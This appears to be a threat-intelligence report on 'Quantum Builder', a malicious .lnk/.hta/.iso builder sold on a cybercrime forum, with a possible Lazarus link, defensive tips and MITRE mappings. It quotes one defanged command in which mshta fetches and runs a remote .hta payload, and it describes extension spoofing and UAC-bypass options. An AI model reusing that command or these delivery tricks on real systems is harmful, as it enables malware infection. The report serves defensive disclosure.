Possibly associated with Lazarus APT group
Cyble Research Labs has constantly been tracking emerging threats and their delivery mechanisms. We have observed a surge in the use of .lnk files by various malware families. Some of the prevalent malware families using .lnk files for their payload delivery of late are:
Additionally, we have seen many APT instances where the Threat Actors (TAs) leverage .lnk files for their initial execution to deliver the payload.
.lnk files are shortcut files that reference other files, folders, or applications to open them. The TAs leverages the .lnk files and drops malicious payloads using LOLBins. LOLBins (Living off the Land Binaries) are binaries that are native to Operating Systems such as PowerShell and mshta. TAs can use these types of binaries to evade detection mechanisms as these binaries are trusted by Operating Systems.
During our OSINT (Open Source Intelligence) activity, Cyble Research Labs came across a new. lnk builder dubbed “Quantum Software/Quantum Builder.” Figure 1 shows a post made by the Threat Actor on a cybercrime forum.
The TA claims that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. Figure 2 shows the pricing details and functionality of the builder.
The TA has created a video demonstrating how to build .lnk, .hta, and .iso files using the Quantum Builder. The .hta payload can be created using Quantum Builder by customizing options such as payload URL details, DLL support, UAC Bypass, execution path and time delay to execute the payload, etc.
The .lnk builder embeds the generated .hta payload and creates a new .lnk file. The builder provides various icons as an option while building the .lnk file. The below figure shows the Quantum .lnk builder.
At the end of this process, the .iso builder is used to create the .iso image containing the .lnk file for further delivery via email and execution.
The TA has also claimed to have implemented a dogwalk n-day exploit. This vulnerability exists in Microsoft Support Diagnostic Tool (MSDT) and could lead to code execution if the user opens a specially crafted .diagcab file, typically sent over emails by TAs. The .diagcab file further downloads a malicious file into the startup folder, which will be executed every time the user logs in.
Further investigation revealed a post shared by the TA, indicating that this sample might be generated using Quantum Builder.
The figure below shows the post made by the TA regarding the above sample.
The sample mentioned in the above post connects to a domain named “quantum-software.online”; the same domain was used by quantum TA as a demo site, as mentioned in the figure below. This indicates that the identified hash is generated using the quantum builder.
This sample is a Windows Shortcut (.LNK) file. By default, Windows hides the .lnk extension, so if a file is named as file_name.txt.lnk, then only file_name.txt will be visible to the user even if the show file extension optionis enabled. For such reasons, this might be an attractive option for TAs, using the .lnk files as a disguise or smokescreen.
Upon execution, the .Ink file runs the malicious PowerShell code, which executes a .hta file hosted in the remote site using mshta.
This script uses a function that deobfuscates the malicious PowerShell script. The function performs a mathematical operation that converts a numeric value into characters. The figure below shows the deobfuscated data.
Command: “C:\Windows\system32\mshta.exe” hxxps[:]//quantum-software[.]online/remote/bdg[.]hta
The infection chain is represented below.
Possible links to Lazarus APT
In recent samples and research conducted on Lazarus APT, we observed that TAs were using .Lnk for delivering further stage payloads. Upon comparing both scripts, we found that the deobfuscation loop and initialization of variables were the same, indicating the possibility of a connection between Quantum Builder and Lazarus APT group.
We have observed a steadily increasing number of high-profile TAs shifting back to .lnk files to deliver their payloads. Typically, TAs use LOLBins in such infection mechanisms because it makes detecting malicious activity significantly harder.
The MSDT zero-day vulnerability, which researchers recently discovered, was also exploiting a LOLBin. Within a short window from this incident being observed in the wild, TAs have leveraged this vulnerability using different attack vectors.
The TA behind Quantum Builder appears to be updating the malicious tool with new attack techniques, making it more attractive to other TAs. We will likely see more usage of such tools in the near future.
We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Verify the source of files before executing them.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.
- Use a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.
- Conduct regular backup practices and keep those backups offline or in a separate network.
MITRE ATT&CK® Techniques
|Tactic||Technique ID||Technique Name|
Command and Scripting Interpreter
|System Binary Proxy Execution |
Deobfuscate/Decode Files or Information
Indicators of Compromise (IOCs)
|Lazarus .lnk file|